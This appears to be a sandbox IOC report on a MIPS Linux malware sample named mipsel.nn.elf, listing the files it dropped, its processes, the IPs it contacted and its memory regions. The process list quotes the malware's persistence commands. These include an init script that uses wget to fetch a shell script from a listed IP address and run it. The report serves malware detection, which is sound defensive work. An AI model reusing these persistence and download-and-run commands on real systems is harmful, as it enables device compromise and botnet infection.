IOC Report
mipsel.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
mipsel.nn.elf
ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
initial sample
malicious
/etc/init.d/mipsel.nn.elf
POSIX shell script, ASCII text executable
dropped
malicious
/etc/init.d/system
POSIX shell script, ASCII text executable
dropped
malicious
/etc/profile
ASCII text
dropped
malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/tmp/qemu-open.EBsJ7m (deleted)
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
/tmp/mipsel.nn.elf
/tmp/mipsel.nn.elf
/tmp/mipsel.nn.elf
-
/bin/sh
sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/mipsel.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/system
/tmp/mipsel.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/system /etc/rcS.d/S99system
/tmp/mipsel.nn.elf
-
/bin/sh
sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n /tmp/mipsel.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf"
/tmp/mipsel.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/mipsel.nn.elf
/tmp/mipsel.nn.elf
-
/bin/sh
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/mipsel.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf
/tmp/mipsel.nn.elf
-
/tmp/mipsel.nn.elf
-
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.aMCx9Fums0 /tmp/tmp.JCLTTmWabl /tmp/tmp.SRiGvKqYas
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.aMCx9Fums0 /tmp/tmp.JCLTTmWabl /tmp/tmp.SRiGvKqYas
There are 31 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
unknown
http://94.156.227.233/
unknown

IPs

IP
Domain
Country
Malicious
54.171.230.55
unknown
United States
109.202.202.202
unknown
Switzerland
94.156.227.234
unknown
Bulgaria
91.189.91.43
unknown
United Kingdom
91.189.91.42
unknown
United Kingdom

Memdumps

Base Address
Regiontype
Protect
Malicious
7f4bec41c000
page execute read
malicious
7f4bec462000
page read and write
7ffe0f9de000
page execute read
7f4c74684000
page read and write
7f4c6c000000
page read and write
7f4c750a8000
page read and write
7f4c743c6000
page read and write
7f4c743d4000
page read and write
7f4c74f77000
page read and write
7f4c74d96000
page read and write
7f4c750ed000
page read and write
7f4c74a65000
page read and write
55a45da9e000
page execute and read and write
7ffe0f902000
page read and write
55a45baa0000
page read and write
55a45f747000
page read and write
7f4c74a48000
page read and write
7f4c73bbe000
page read and write
7f4c74a25000
page read and write
55a45b80e000
page execute read
7f4bec45d000
page read and write
55a45ba96000
page read and write
7f4c750a0000
page read and write
7f4c6c021000
page read and write
55a45dab5000
page read and write
There are 15 hidden memdumps, click here to show them.